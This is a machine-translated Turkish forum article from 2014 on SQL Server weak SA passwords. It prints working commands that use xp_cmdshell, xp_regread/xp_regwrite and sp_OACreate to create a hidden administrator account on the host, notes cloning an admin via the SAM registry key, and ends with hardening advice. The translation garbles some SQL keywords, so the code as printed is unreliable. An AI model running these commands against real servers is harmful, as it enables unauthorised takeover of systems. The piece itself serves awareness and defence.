Bu makale makine çevirisi ayna makalesidir, orijinal makaleye geçmek için lütfen buraya tıklayın.

Görünüm: 10962|Yanıt: 0

[Kaynak] 2011 MSSQL System Security SA Zayıf Şifre Güvenliği Riski Eğitimi

[Bağlantıyı kopyala]
Yayınlandı 26.11.2014 15:48:23 | | |
Depolanmış prosedürler, SQLServer'da depolanan önceden yazılmış SQL ifadelerinin bir koleksiyonudur; bunlar arasında en tehlikeli genişletilmiş depolanmış prosedürler xp_cmdshell olup, işletim sisteminin herhangi bir komutunu çalıştırabilir ve SA, Microsoft SQLServer'ın yönetici hesabıdır; en yüksek ayrıcalıklara sahiptir; genişletilmiş depolanmış prosedürleri çalıştırabilir ve yürütme gibi geri dönüş değerlerini elde edebilir:
Yönetici Üsta.. xp_cmdshell 'net kullanıcı testi 1234 /add' ve yönetici master: xp_cmdshell 'net localgroup administrators test /add'
Bu şekilde, kullanıcı adı test, şifre 1234 ve yönetici ayrıcalıkları diğer tarafın sistemine eklenir; Şekil 1'de gösterildiği gibi.

Şimdi neden SA şifresini aldığınızı ve sistemin en yüksek ayrıcalıklarını aldığınızı anlamalısınız. Çoğu zaman birçok ağ yöneticisi bu durumu bilmez ve SA kullanıcıları için 1234 ve 4321 gibi basit şifreler kullanır ya da hiç şifre koymaz; böylece ağ istilacı kişiler SA şifresini bazı hackleme araçlarıyla kolayca tarayıp, bilgisayarı kontrol edebilir.
xp_cmdshell dışında, istilacılar tarafından kullanılabilecek depolanmış prosedürler de vardır:
1. xp_regread (bu genişletilmiş saklanan prosedür, kayıt defterinde belirtilen anahtarda belirtilen değeri okuyabilir), nasıl kullanılır (makine adını alın):
DEKLARASYON@testvarchar(50) EXECUTIVE master.. xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='system\controlset001\control\computername\computername', @value_name='computername', @value=@test ÇIKIŞ SEÇİMİ @test
2. xp_regwrite (bu genişletilmiş saklanan prosedür, kayıt defterinde belirtilen anahtarda belirtilen değeri yazabilir) ve nasıl kullanılacağı (HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue anahtarında bbb yazmak):
EXECUTIVE master.. xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\aaa', @value_name='aaaValue', @type='REG_SZ', @value='bbb'
Eğer tehlikeye giren bilgisayarın yönetici kullanıcısı kayıt defterindeki HKEY_LOCAL_MACHINE\SAM\SAM\ bilgilerini gezebiliyorsa, xp_regread ve xp_regwrite adlı iki saklanan prosedür yönetici kullanıcıyı klonlamak ve yönetici ayrıcalıkları elde etmek için kullanılabilir. xp_regdeletekey xp_regdeletevalue ayrıca sisteme güvenlik riskleri getirecek.   3. OLE ile ilgili bir dizi depolama prosedürü olan bu depolama prosedürleri serisi sp_OACreate, sp_OADestroy, sp_OAGetErrorInfo, sp_OAGetProperty, sp_OAMethod, sp_OASetProperty, sp_OAStop, kullanıma sahiptir:
DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell ÇIKIT EXEC SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net user test 1234 /add'--
Bu şekilde, diğer sistem kullanıcı adı verilen bir test ve 1234 şifreli bir kullanıcı ekler ve ardından şunları çalıştırır:
DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell ÇIKIT EXEC SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net localgroup yöneticileri test /add '--
Kullanıcı testi, Yöneticiler grubuna eklendi.   Çözüm: SA'ya, siber saldırganların kırmasını zorlaştıracak kadar karmaşık bir şifre verin. Güvenlik için, SQLS'sp_addextendedproc sp_dropextendedproc de saklanan prosedürleri erver's sorgu analizöründe sp_dropextendedproc xp_cmdshell gibi depolanmış prosedürleri silmemiz ve gerektiğinde sp_addextendedproc kurtarma kullanmamız gerekiyor. OLE ile ilgili depolanmış prosedürlerin silinmesinin Enterprise Manager'daki bazı işlevlerin kullanılamaz hale gelmesine yol açabileceği ve yazarın burada silmelerini önermediği belirtilmelidir.
Artık SP_OACREATE nasıl kullanacağımızı bildiğimize göre, \WINNT \system32'ye gidip cmd.exe, net.exe ve net1.exe üç dosyayı bulabilir ve "Özellikler" - "Güvenlik" bölümünden erişebilen tüm kullanıcıları silebiliriz, böylece sistem kullanıcı sayısını artırmak için SP_OACREATE kullanamayız ve bu dosyalara erişmek zorunda olduğumuzda erişim kullanıcıları ekleyebiliriz.




Önceki:2011 MSSQL Statement Password Validation Security Vulnerability Tutorial
Önümüzdeki:2011 yılında SA hesaplarını varsayılan olarak değiştirmek ve silmek için en güvenli yol MSSQL2000
Feragatname:
Code Farmer Network tarafından yayımlanan tüm yazılım, programlama materyalleri veya makaleler yalnızca öğrenme ve araştırma amaçları içindir; Yukarıdaki içerik ticari veya yasa dışı amaçlarla kullanılamaz, aksi takdirde kullanıcılar tüm sonuçları ödemelidir. Bu sitedeki bilgiler internetten alınmakta olup, telif hakkı anlaşmazlıklarının bu siteyle hiçbir ilgisi yoktur. Yukarıdaki içeriği indirmeden sonraki 24 saat içinde bilgisayarınızdan tamamen silmelisiniz. Programı beğendiyseniz, lütfen orijinal yazılımı destekleyin, kayıt satın alın ve daha iyi orijinal hizmetler alın. Herhangi bir ihlal olursa, lütfen bizimle e-posta yoluyla iletişime geçin.

Mail To:help@itsvse.com